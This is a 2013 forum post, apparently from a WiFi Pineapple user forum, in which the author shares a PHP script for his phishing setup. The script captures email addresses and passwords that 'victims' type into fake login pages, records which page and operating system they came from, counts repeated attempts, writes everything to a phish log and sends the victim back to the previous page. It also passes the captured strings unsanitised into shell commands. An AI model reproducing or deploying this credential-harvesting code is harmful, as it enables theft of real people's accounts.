NullNull Posted July 22, 2013 Posted July 22, 2013 (edited) Hello guys, i just want to share the error.php file i am using... It's nothing special since my knowledge in php is limited but here it is.. When i use the pineapple in real action it doesn't have an internet connection so the "date("G:i:s")" command (line 3) shows the "up time" of the pineapple. The original error.php was posting at the phish.log the entire url wich in my case was something like this:http://www.blabla.com/web/files/example1/example1.html . I didn't liked the output of that so i added the first "if" wich changes the final output to this " hh:mm:ss -- Example 1 -- email -- password" I noticed that when the victim could not establish an internet connection he was pressing the "Log in" button again and again with out typing the password and because i dont think someone has a blank password in the websites i "phish" i added the "&& !empty($_POST['pass'])" (line 14) so it wont log any data with blank password. Also not having an internet connection the victim was trying again and again with the same credentials leading to long and difficult to read logs. For this reason i added the third "if".EDIT: Added $_SERVER["HTTP_USER_AGENT"] wich detects clients OS Counting how many times the victim uses the same combination email/password <?php $uptime = date("G:i:s"); /* =========== Detect the Phishing Page =========== */ $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "example1")){ $page = "Example 1"; } elseif (strpos($ref, "example2")){ $page = "Example 2"; } /* ================================================ */ /* ================= Detect the OS ================ */ $ua = $_SERVER["HTTP_USER_AGENT"]; $platform = "Unknown"; if (strpos($ua, "Android")) { $platform = "Android"; } elseif (strpos($ua, "iPhone")) { $platform = "iPhone"; } elseif (strpos($ua, "Windows")) { $platform = "Windows"; } elseif (strpos($ua, "BlackBerry")) { $platform = "BlackBerry"; } elseif (strpos($ua, "Linux")) { $platform = "Linux"; } elseif (strpos($ua, "Macintosh")) { $platform = "Macintosh"; } /* ================================================ */ /* ====================== Checking and Saving Data =============================== */ if (isset($_POST['email']) && !empty($_POST['email']) && !empty($_POST['pass'])) { $nam = stripslashes($_POST['email']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $cre = $page . " -- ". $nam . " -- " . $pas; $file = file_get_contents("/pineapple/phish.log"); $count = 1; if (!strpos($file, $cre)) { $content = $cre . " -- " . $count . " -- " . $platform . " -- " . $uptime; $filed = @fopen("/pineapple/phish.log", "a+"); @fwrite($filed, $content."\n"); @fclose($filed); } else { $count = exec("awk -F ' -- ' '$0 ~ str{print substr($4,1)}' str='$cre ' /pineapple/phish.log"); $count = $count + 1; exec("sed '/$cre /c \\$cre -- $count -- $platform -- $uptime' -i /pineapple/phish.log"); } } /*================================================================================ */ ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> I am sure there is a much better and cleaner way to do all this but thats all i got :P. Any suggestions and changes of course are welcomed. Edited August 7, 2013 by KiatoG Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.